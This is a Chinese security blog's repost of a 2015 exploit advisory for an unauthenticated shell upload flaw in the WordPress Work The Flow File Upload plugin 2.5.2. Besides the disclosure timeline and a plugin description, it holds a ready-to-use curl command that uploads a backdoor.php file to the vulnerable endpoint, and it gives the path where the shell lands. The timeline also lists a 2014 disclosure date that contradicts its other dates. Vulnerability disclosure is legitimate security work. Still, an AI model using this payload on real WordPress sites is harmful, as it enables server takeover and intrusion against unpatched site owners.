WordPress Work-The-Flow 2.5.2上传shell

描述:
WordPress Work The Flow plugin version 2.5.2 suffers from a remote shell upload vulnerability.

######################

# Exploit Title : WordPress Work the flow file upload 2.5.2 Shell Upload Vulnerability

# Exploit Author : Claudio Viviani

# Software Link : https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip

# Date : 2015-03-14

# Tested on : Linux BackBox 4.0 / curl 7.35.0

######################

# Description:

Work the Flow File Upload. Embed Html5 User File Uploads and Workflows into pages and posts.
Multiple file Drag and Drop upload, Image Gallery display, Reordering and Archiving.
This two in one plugin provides shortcodes to embed front end user file upload capability and / or step by step workflow.

######################

# Location :

http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php


######################

# PoC:

curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php

# Backdoor Location:

http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php


######################

# Vulnerability Disclosure Timeline:

2015-03-14:  Discovered vulnerability
2015-04-03:  Vendor Notification
2015-04-03:  Vendor Response/Feedback
2015-04-04:  Vendor Fix/Patch (2.5.3)
2014-04-04:  Public Disclosure

[2015-04-07]  #

本文固定链接: https://www.unhonker.com/bug/1715.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2015年04月07日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: WordPress Work-The-Flow 2.5.2上传shell | 90' s Blog|关注网络信息安全
关键字:

WordPress Work-The-Flow 2.5.2上传shell:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!